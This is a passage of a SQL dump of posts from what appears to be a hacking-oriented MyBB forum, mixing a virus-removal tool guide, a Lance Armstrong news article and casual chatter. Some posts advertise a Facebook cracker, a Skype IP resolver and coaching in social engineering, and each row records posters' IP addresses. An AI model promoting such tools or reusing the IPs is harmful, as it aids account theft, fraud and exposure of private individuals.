diagnosed with cancer, doctors had given him less than a 50 percent chance of survival before surgery and brutal cycles of chemotherapy saved his life. Armstrong\'s riveting victories, his work for cancer awareness and his gossip-page romances with rocker Sheryl Crow, fashion designer Tory Burch and actress Kate Hudson made him a figure who transcended sports. His dominance of the Tour de France elevated the sport\'s popularity in America to unprecedented levels. His story and success helped sell millions of the \'\'Livestrong\'\' plastic yellow wrist bracelets, and enabled him to enlist lawmakers and global policymakers to promote cancer awareness and research. His Lance Armstrong Foundation has raised nearly $500 million since its founding in 1997. Jeffery C. Gervey, chairman of the foundation, issued a statement of support saying: \'\'Faced with a biased process whose outcome seems predetermined, Lance chose to put his family and his foundation first,\'\' Gervey said. \'\'The leadership of the Lance Armstrong Foundation remain incredibly proud of our founder\'s achievements, both on and off the bike.\'\' Created in 2000, USADA is recognized by Congress as the official anti-doping agency for Olympic sports in the United States. Its investigators joined U.S. agents during the federal investigation of Armstrong. Tygart dismissed Armstrong\'s lawsuit as an attempt at \'\'concealing the truth,\'\' saying the agency is motivated by one goal - exposing cheaters. Armstrong had tense public disputes with USADA, the World Anti-Doping Agency, some former teammates and assistants and even Greg LeMond, the first American to win the Tour de France. Others close to him were caught up in the investigations, too: Johan Bruyneel, the coach of Armstrong\'s teams, and three members of the medical staff and a consultant were also charged. Bruyneel is taking his case to arbitration, while two medical team staffers and consulting doctor Michele Ferrari didn\'t formally contest the charges and were issued lifetime ban by USADA. Ferrari later said he was innocent. Questions surfaced even as Armstrong was on his way to his first Tour victory. He was leading the 1999 race when a trace amount of a banned anti-inflammatory corticosteroid was found in his urine; cycling officials said he was authorized to use a small amount of a cream to treat saddle sores. After Armstrong\'s second victory in 2000, French judicial officials investigated his Postal Service team for drug use. That investigation ended with no charges, but the allegations kept coming. Armstrong was criticized for his relationship with Ferrari, who was banned by Italian authorities over doping charges in 2002. Former personal and team assistants accused Armstrong of having steroids in an apartment in Spain and disposing of syringes that were used for injections. In 2004, a Dallas-based promotions company initially refused to pay him a $5 million bonus for winning his sixth Tour de France because it wanted to investigate allegations raised by media in Europe. Testimony in that case included former teammate Frankie Andreu and his wife, Betsy, saying Armstrong told doctors during his 1996 cancer treatments that he had taken a cornucopia of steroids and performance-enhancing drugs. Two books published in Europe, \'\'L.A. Confidential\'\' and \'\'L.A. Official,\'\' also raised doping allegations and, in 2005, French magazine L\'Equipe reported that retested urine samples from the 1999 Tour showed EPO use. Armstrong fought every accusation with denials and, in some cases, lawsuits against media outlets that reported them. He retired in 2005 and almost immediately considered a comeback before deciding to stay on the sidelines - in part because he didn\'t want to keep answering doping questions. \'\'I\'m sick of this,\'\' Armstrong said in 2005. \'\'Sitting here today, dealing with all this stuff again, knowing if I were to go back, there\'s no way I could get a fair shake - on the roadside, in doping control, or the labs.\'\' Three years later, Armstrong was 36 and itching to ride again. He came back to finish third in the 2009 Tour de France. Armstrong raced again in 2010 under the cloud of the federal investigation. Early last year, he quit the sport for good, making a brief return as a triathlete until the USADA investigation shut him down. During his sworn testimony in the dispute over the $5 million bonus, Armstrong said he wouldn\'t take drugs because he had too much to lose. \'\'(The) faith of all the cancer survivors around the world. Everything I do off the bike would go away, too,\'\' Armstrong said then. \'\'And don\'t think for a second I don\'t understand that. It\'s not about money for me. Everything. It\'s also about the faith that people have put in me over the years. So all of that would be erased.\'\' source http://sports.yahoo.com/news/lance-armstrong-faces-big-decision-165515351--spt.html', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5f35c25da6e50d780dd64ed9c2622e4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('728', '202', '0', '25', 'Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '54', 'Sin Cara', '1345783924', 'credits :- [size=large][color=#FF4500]SuaveSalmon[/color] [/size] Here is a simple Virus Removal guide. Think you have a virus? Computer slow, popups, random ads, or just want to check? Well in this case you have come to the right thread. Here I will show you how to take all that off with simple programs. All links will be provided straight to the download link. So lets get started. All the adf.ly money will go to hackforums and member giveaways! All links are from the authorized sites First: Install Mozilla firefox (I recommend it because it has a virus detection built in, it will scan all files before download them, it takes around 3 seconds for them to scan it) at http://adf.ly/65Nbi Second: open it up. You can transfer all your passwords from Internet Explorer (or what you are using) to Firefox if you would like. I wouldn\'t suggest it but you can if you want. Third: Once you have Firefox installed go to this link http://adf.ly/65Ne5 and save the the file. It is eset online scanner. When you save it a little box will appear double and download the file. Click esetsmartinstaller.exe and click run. Accept the terms of use. Let it do its three steps. It may open and close a few times but just wait. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/eset.png[/img] You should be brought to this box. Check off clean archives and once you have done that look under the scan archives options. You should see an icon that say advanced options. Click on that and check the options I have checked. Once you have done so click start. It will download its virus database so let it do so. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/Untitled.png[/img] Once this is done it should start a scan automatically. Let this run and go watch a YouTube episode (http://adf.ly/65NTY YouTube link. Just trying to scrape up some cash). It may make your computer lag (depending on your specs) a little bit but not to bad. Once the scan is done click the remove the programs button or next. When it is done click next or the other option it gives you. It will tell you to download and their program and explain it so when you have completed and removed all harmful programs you can close it. I would suggest eset it is paid but it is a very effective antivirus. http://adf.ly/65OZT there is the link to their homepage if you want the amazing program!You even get a free 30 day trial! Step four: You are going to need to reopen Firefox and download malwerbytes. Here is the main website http://adf.ly/65Nhk but it may be down and if so download from cnet http://adf.ly/65NmA Once you have downloaded it will bring up the download box. Once done downloading double click it and run the mbam.exe file. Click English (or the language you would prefer) and follow through the setup. Once at the end of the setup click install. It will say launch and update malwerbytes so just click finish and it will do so. It will connect to their server and download the virus detection database. Just let it download and click ok. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/mbam.png[/img] Go to the “Settings” tab and make sure you have everything I have checked (don\'t forget the boxes below the check marks). Once you have these settings checked go back to the “Scanner” tab and click perform full scan. It may take a while so go watch another YouTube video ( http://adf.ly/65NTY ). Once it is done click show results in the bottom corner if you have any results make sure there is a check next to all of them and then click remove all. It will ask you to restart so do so! Step 5: Download ccleaner http://adf.ly/65No1 run the .exe in the pop up box. One you have done that follow through with the steps. One you get to the recycle bin menu check off what you feel you should. Then click finish and it will open. Check off all the options I have checked off in the picture below. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/cc.png[/img] Check off network passwords too. One you have done that go to the applications tab, right next to the cleaner/windows button. Make sure every single application has a check next to it. ALL OF THEM! Then click run cleaner. Do not analyze just click the “Run Cleaner” button. It may take a while depending on how much junk you may have. Then go to the registry tab and click scan for issues. You may see a bunch of problems so click fix. Then click fix all selected issues. It will ask you to save a copy of the registry so click yes and let it save. Step 6: Download spybot search and destroy http://adf.ly/65Npr click save file. Double click the spybot.exe in the pop up once it is done downloading. Now you have spybot open click, English (or the language you prefer)and accept the terms of use. Now check of these options. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/spybot.png[/img] Click next then next again and next. You may want to install teatimer. I would not prefer it. You can use it as a free antivirus but it may make your computer lag (depending on your specs). I would suggest it if you click on a lot of random links. It blocks some malicious/virus filled links. But if you do not have a great computer than just leave it off. Also go ahead and check off the internet explorer tool. Click next and install. It will give you two bars downloading the program. Then it will extract. You will get a box with three options checked. That is good leave that and click finish. It will load. Then it will give you two boxes. Click create a registry back up. Let it do its thing. Then click next and click start using program now. Click search for updates. Click any of the options with your country’s flag next to it, as it downloads the virus database from that server making it faster in your country. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/spybotsd.png[/img] Check off the options in the picture above. Then click download. It will download. Once done go to the immunize tab on the main bar (shown in the picture below). [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/dsfdsg.png[/img] Close all browsers and click immunize. While it is immunizing go to the search and destroy bar./tab Click on check for problems. It may say you have some temp files and it wants to delete them so just click yes and let it scan. When it is completed you will get some options. Put a check next to all the options and fix selected problems. Now I recommend re-scan but not crucial. Step 6/Recommended: Download Vulcan\'s virus scanner http://adf.ly/7IKG6 The great member ???Mephobia made this amazing scanner! Few things to note: This is a homemade/handmade scanner, you will not find a tool like this, and it is free forever. It gives you a popup when you open it and a popup when its done scanning. Here is what the GUI looks like when you are done scanning [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/Vulcan.png[/img] This tool, Scans the whole system, has an Active Anti-Virus, has Quarantine List, has CPU Info, can Restore Regedit, CMD, Run, Folder Options, UAC, Hosts File, System Restore, and Task Manager (Scans are under 1 minute). Thread to his scanner http://www.hackforums.net/showthread.php?tid=2141173 . It is a great tool, I would recommend it! Step 7/Possibility: This step is not needed but recommended. There is a slight chance you may have a darkcomet R,A.T. If Vulcan\'s scanner didn\'t pick up on this then this is just an optional step! It is the darkcomet removal tool http://adf.ly/7IMvg It is a tool for removing another tool that can have someone else controlling your computer, also known as a R.A.T. You can get them from running any untrusted file! Download it, open up the darkcomet folder and run the .exe file [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/darkcometremoval.png[/img] Click scan, it may take a while to scan, then if it finds it, remove it. If it doesn\'t find anything then just click the fine button. There is a slight chance you could have the darkcomet rat out of the thousands of rats because it is a free program. [hr] Step 8: Get tdss killer. http://adf.ly/65pMT it removes rootkits. Click download and let it update itself. One that is done click change parameters. Then make sure everything has a check next to it. If you have any threats then click next or remove. Keep scanning until the rootkits are gone. [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/tdss.png[/img] Step recommended: Download Infested cleaner http://adf.ly/65T4x go to the botkill section, check advanced and click botkill [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/yes.png[/img] click yes, click ok, [img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/yes3.png[/img] then hit ok. Bam you are done. This tool will kill most R.A.T.s and unauthorized programs running and prevent them from starting up. Step 9: Reboot your computer and enjoy it begin clean of viruses. PS: I took all these pictures on my personal computer!', '119.154.12.80', '2006584400', '1', '0', '54', '1345783961', '1', 'e5c5abeac26c5a42091ff2f2e97e510f', '0', '1345783961'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('729', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '84', 'Thunder™', '1345784819', 'Thanks for Upgrade but i suggest u to change colour of username for elite', '111.91.95.190', '1868259262', '0', '0', '0', '0', '1', '0b7600d69055ae3041f53604169a3378', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('730', '112', '571', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345784821', '[quote=\'Apathy\' pid=\'571\' dateline=\'1345582636\'] hit me up with this pack. [/quote] PPD ebooks pack is sent... check your pm now.', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'ca5f78c4fb96e480974ab95facdc0999', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('731', '111', '274', '29', 'RE: MyFreeCams Model Registeration', '0', '84', 'Thunder™', '1345784926', 'Thanks for share i will leave feedb4ack soon.', '111.91.95.190', '1868259262', '0', '0', '0', '0', '1', '6e6a13db17d650a4f47a107a8f7ce991', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('732', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '84', 'Thunder™', '1345785439', 'Update the link please Thanks man JakeUS edit: Don\'t spam, take this as a warning.', '111.91.95.190', '1868259262', '0', '0', '20', '1345822993', '1', '82df64d797835acc80c6a24ad8390714', '0', '1345822993'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('733', '164', '729', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345811115', '[quote=\'Thunder™\' pid=\'729\' dateline=\'1345784819\'] Thanks for Upgrade but i suggest u to change colour of username for elite [/quote] The non upgraded members username color is blue/cyan. Elite members username color is grey', '41.114.8.111', '695339119', '1', '0', '0', '0', '1', 'd7011ac1ccb78522dc2a28c454ac7410', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('734', '191', '666', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1345811608', 'Its made in GameMaker O.o', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '419f716461e98a8b5284591bd42cb660', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('735', '202', '728', '25', 'RE: Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '67', 'HoverCatz', '1345812836', 'Fix the DarkCometRemover link :s', '85.165.36.95', '1436886111', '1', '0', '67', '1345812848', '1', '6bac201ca8f392b280526c60d61e88ec', '0', '1345812848'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('736', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '67', 'HoverCatz', '1345812993', 'Yeah, switch colors for Member and Elite.', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '4e5904912d4eae0271df57f5affba134', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('927', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345918052', 'Tell me the links.... i think all are fine ;)', '173.245.53.115', '-1376438925', '1', '0', '0', '0', '1', '131695eb24cda16a2ad9806eeec087d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('738', '184', '683', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345813903', '[quote=\'NXK\' pid=\'683\' dateline=\'1345757794\'] [quote=\'iTzIpod\' pid=\'671\' dateline=\'1345749808\'] [quote=\'NXK\' pid=\'660\' dateline=\'1345738559\'] [quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\'] It\'s alright. Also, if I ever got a video I need edited, I will come to you. =] What game is this? Also, what system? PS3, Xbox 360, PC? [/quote] It\'s counter strike source for PC [/quote] Oh. Do you have a HDPVR with a Xbox 360 or Ps3 with CoD Games? :p [/quote] No I do not. The only footage I edit of console games is pre recorded. [/quote] Oh alright. I\'ll find someone with a HDPVR to record one of my games. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5de55416ef06eefddd62df7247264367', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('739', '203', '0', '16', '[Limited] Free SEing Help', '0', '82', 'iTzIpod', '1345814261', 'Hey LH, I will be offering a Limited Edition help. (I don\'t know what to call this thread. -.-) Meh. I am going to TeamViewer you & Skype with you. And I will assist you with SEing from any company. Please note that if you get caught, I am not responsible. I will only do this for the first 3 members that post here. Don\'t post \"Oh, good luck\" or something like that. Only post if you are interested. I have many methods on how to SE. So I\'m pretty sure my knowledge is decent. Also Note: Just because I am helping you, doesn\'t mean I\'m going to do all of the work. And, you might fail. My methods are not 100% foolproof.', '24.212.197.164', '416597412', '1', '0', '82', '1351894688', '1', 'f67a8a59e0ef23ce8b4126ba0adbfc2f', '0', '1351894688'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('740', '201', '727', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '82', 'iTzIpod', '1345814819', 'That is too much too read! :?:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e3362c7b5f4f1e5764401f7698063757', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('741', '204', '0', '29', '[FREE]Skype Resolver API', '0', '1', 't3h jok3r', '1345816344', '[align=center][font=Segoe UI][size=xx-large][color=white][b][u]L33THacking\'s Skype Resolver API Giveaway[/u][/b][/color][/size][/align] [size=medium][list][b]Information[/b] [list]This will resolve an online Skype username and give you the IP.[/list] [b]How To Get[/b] [list]Post on this thread [/size][/list] [/font][/list]', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '864e6b3d501010e0a5f13fd90d62f4d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('742', '163', '732', '30', 'RE: [REAL]Facebook Cracker', '0', '5', 'Timmy', '1345816882', '[quote=\'Thunder™\' pid=\'732\' dateline=\'1345785439\'] Update the link please 25 charac [/quote] The link works for me and i reported you for LQP.', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '901f3af50143eb8d0a61f901846d4f66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('743', '205', '0', '53', 'First Java Multiplayer \"Game\"', '0', '67', 'HoverCatz', '1345817135', 'Hey :D I made my first Java Multiplayer game, but only Movement works. Tell me what u think :o You need to portforward if you want to host it so others can connect :P [b]DOWNLOADS:[/b] Server: [url=https://dl.dropbox.com/u/33062220/Blocks%20-%20Server.jar]Here[/url] Client: [url=https://dl.dropbox.com/u/33062220/Blocks%20-%20Multiplayer.jar]Here[/url] [b]Screenshot[/b]: Server: [img]http://gyazo.com/5520d3df6647a536c494133997ce6385.png[/img] Client: [img]http://gyazo.com/3b88c21affa48305685c41f8a1345f58.png[/img] NOTE: Dont edit the files without asking me for permission.', '85.165.36.95', '1436886111', '1', '0', '67', '1345817444', '1', 'f304cba1abfc7c169e694c8f849a4224', '0', '1345817444'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('744', '43', '105', '7', 'RE: How did you find us?', '0', '101', 'KFallen', '1345817254', 'I saw and add. I plan to be active.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '5eacd9c39346a4d7b05f3f17171f8c39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('765', '187', '764', '3', 'RE: Public Downloads?', '0', '1', 't3h jok3r', '1345822138', '[quote=\'iTzIpod\' pid=\'764\' dateline=\'1345821801\'] [quote=\'t3h jok3r\' pid=\'684\' dateline=\'1345758374\'] I actually agree with R?????zo? and iTzIpod. We currently need activity and need some bumps on good giveaways and tutorials as well. [/quote] So are you going to deny or accept this suggestion? [/quote] I\'m going to sadly deny my own suggestion. Hey I just found out that LH doesn\'t have a crying smiliey.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '0cfc620efc623f596d8bba77c04d1001', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('746', '200', '723', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1345817347', 'http://dl.dropbox.com/u/26951938/Photoshop.rar It\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK. ENJOY!', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '7e901dc9de979d3e540c2ddce04bfa65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('747', '31', '86', '7', 'RE: How long are you online daily?', '0', '101', 'KFallen', '1345817434', '2-4 on school days. 5-16 on summer days.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', 'acdacd5f922315d4da1df75507a5f1bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('748', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '101', 'KFallen', '1345817602', 'I would also like to know what Dota 2 is.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '9e365be7beccef563fce06148a96b982', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('749', '31', '86', '7', 'RE: How long are you online daily?', '0', '82', 'iTzIpod', '1345817656', 'I got school soon and so I won\'t be as active as I am now. Probably on Weekdays - 3-4 hours. Weekends - 5-7 hours. 20 Hours Online so far. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '556ee9f54906fc23ffddb1124f12a9fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('750', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1345817747', 'No it\'s not. Why do you think that. Its a normal GUI', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0aa66a3472a748e9ca665b71d12fd786', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('751', '204', '741', '29', 'RE: [FREE]Skype Resolver API', '0', '67', 'HoverCatz', '1345817777', 'Omg haha This is exactly wut i need :o', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '3d4e83cf073f7b8f73a4f184a486e2bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('752', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '101', 'KFallen', '1345817788', 'Mostly EXTREME POWER METAL!, dubstep, techno. But I also listen to heavy metal, death metal, thrash metal, but not as much as I used to.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '8eb320d6d0553f65edd1c4857844e69f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('753', '200', '746', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345818053', '[quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\'] http://dl.dropbox.com/u/26951938/Photoshop.rar It\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK. ENJOY! [/quote] Is it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '23938876f17242c012b74bf70f99446e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('754', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '101', 'KFallen', '1345818109', 'The beats are pretty good, but I just don\'t like rap.....', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '2bc4aeb6ffb786756207bc43fe2d62ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('755', '179', '593', '34', 'RE: [tut] Multiple 3D text tutorials', '0', '1', 't3h jok3r', '1345818297', 'No problem, Enjoy and good luck with your 3D text', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '776164ff61c2d4bf92434c69de75a039', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('756', '202', '728', '25', 'RE: Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '101', 'KFallen', '1345818833', 'Good thing I already had many of these.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', 'ba0daf8c2a3a3ddf2576c47926a5fe33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('757', '201', '727', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '1', 't3h jok3r', '1345819163', 'Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '765c381110e02ae062809147d6212113', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('758', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1345819985', '@KFallen you must listen to a lot of songs. I dislike metal though. Sorry! :d', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb885ff04c78096cffcde3110b5c8169', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('759', '189', '652', '49', 'RE: Webmaster 